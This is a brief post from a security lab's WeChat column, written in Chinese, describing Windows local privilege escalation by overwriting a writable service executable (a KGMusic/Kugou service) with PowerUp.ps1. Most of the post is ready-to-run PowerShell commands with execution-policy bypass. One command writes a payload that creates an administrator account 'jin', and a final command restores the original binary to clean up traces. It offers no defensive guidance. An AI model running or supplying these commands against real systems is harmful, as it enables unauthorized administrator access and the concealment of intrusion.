古語有(yǒu)雲：“學如逆水(shuǐ)行(xíng)舟，不進則退。”面對如今随時(shí)都在變化的網絡安全環境更是如此。為(wèi)此，創信華通(tōng)微信公衆号特開(kāi)設“創安實驗室專欄”，以記錄創信華通(tōng)創安實驗室在技(jì)術(shù)上(shàng)的探索，加強同行(xíng)間(jiān)的交流，相互學習，共同進步。

✦+

原理(lǐ)：利用PowerUp.ps1生(shēng)成一個(gè)可(kě)以執行(xíng)我們構造的惡意命令的同名可(kě)執行(xíng)程序并替換原本的可(kě)執行(xíng)程序。主程序執行(xíng)時(shí)調用同名可(kě)執行(xíng)程序來(lái)執行(xíng)我們構造的惡意命令。

查找具有(yǒu)可(kě)寫的可(kě)執行(xíng)文件：powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

查看程序對用戶的權限：icacls "D:\tools\KGMusic\9.1.44.23567\service.exe"

利用可(kě)執行(xíng)文件提權，向可(kě)寫程序中寫入創建用戶的payload：powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-ServiceEXE -ServiceName KugouService -Username jin -Password jin -Verbose}"

等待服務重啓或對應程序再次運行(xíng)：

可(kě)以看到此時(shí)新建了一個(gè)管理(lǐ)員權限的用戶jin

清理(lǐ)痕迹：powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Restore-ServiceEXE -ServiceName KugouService}"

創安實驗室